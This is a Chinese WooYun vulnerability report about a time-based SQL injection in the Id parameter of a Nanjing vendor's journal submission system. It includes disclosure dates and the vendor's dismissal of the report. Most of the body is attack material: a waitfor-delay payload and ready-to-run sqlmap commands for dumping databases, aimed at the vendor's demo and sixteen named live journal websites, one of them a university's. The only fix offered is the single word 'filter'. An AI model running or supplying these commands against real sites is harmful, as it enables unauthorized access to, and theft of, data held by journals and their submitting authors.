当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080467

漏洞标题:某期刊投稿系统SQL注入漏洞之一

相关厂商:南京杰诺瀚软件科技有限公司

漏洞作者: 路人甲

提交时间:2014-10-23 19:02

修复时间:2015-04-02 11:07

公开时间:2015-04-02 11:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-23: 细节已通知厂商并且等待厂商处理中
2014-10-28: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-22: 细节向核心白帽子及相关领域专家公开
2015-01-01: 细节向普通白帽子公开
2015-01-11: 细节向实习白帽子公开
2015-04-02: 细节向公众公开

简要描述:

~~总之影响众多投稿系统。。

详细说明:

南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞,可获取数据库任意数据...
官网:http://www.025journal.com/
演示系统:
http://www.025journal.com/demo1/
http://www.025journal.com/demo2/
客户案例:http://www.025journal.com/Web/CommonPage.aspx?Id=8
百度搜索: 投稿系统 技术支持:南京杰诺瀚软件

1.png


注入链接:/web/CommonPage.aspx
注入参数:Id
Payload:Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1);waitfor%20delay%20%270:0:5%27—
SQLMAP注入命令:sqlmap -u 'http://xxxx/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch


漏洞证明:

以官网demo作为测试案例:http://www.025journal.com/demo1/
1、手工报错测试
http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1)--

1.png


2、延时注入测试
http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1);waitfor%20delay%20%270:0:5%27--
3、sqlmap注入测试
sqlmap -u 'http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch

1.png


59个数据库,由于是时间延迟注入,获取数据的速度比较慢。。。
在线案例:
(1)http://www.gjmzyfs.com/
sqlmap -u 'http://www.gjmzyfs.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1)*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch

1.png


(2)http://sypf.cnmanu.net
sqlmap -u 'http://sypf.cnmanu.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch

2.png


(3)http://xnxyxb.cnmanu.cn/
sqlmap -u 'http://xnxyxb.cnmanu.cn/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch

3.png


(4)http://www.lcjsyx.com/
sqlmap -u 'http://www.lcjsyx.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch

4.png


(5)http://gaojian.xhnj.com/
sqlmap -u 'http://gaojian.xhnj.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(6)http://xb.cuit.edu.cn/
sqlmap -u 'http://xb.cuit.edu.cn/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(7)http://sypf.cnmanu.net/
sqlmap -u 'http://sypf.cnmanu.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(8)http://sypf.cnmanu.net/
sqlmap -u 'http://sypf.cnmanu.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(9)http://tg.fiberglass365.com/
sqlmap -u 'http://tg.fiberglass365.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(10)http://www.xnumed.com/
sqlmap -u 'http://www.xnumed.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(11)http://www.mfskin.net/
sqlmap -u 'http://www.mfskin.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(12)http://www.jsnyxb.com/
sqlmap -u 'http://www.jsnyxb.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(13)http://www.lcsjbx.com/
sqlmap -u 'http://www.lcsjbx.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(14)http://www.chinaelectrondevices.com/
sqlmap -u 'http://www.chinaelectrondevices.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(15)http://www.apsjournal.com/
sqlmap -u 'http://www.apsjournal.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*'--dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(16)http://www.gjmzyfs.com/
sqlmap -u 'http://www.gjmzyfs.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-02 11:07

厂商回复:

最新状态:

暂无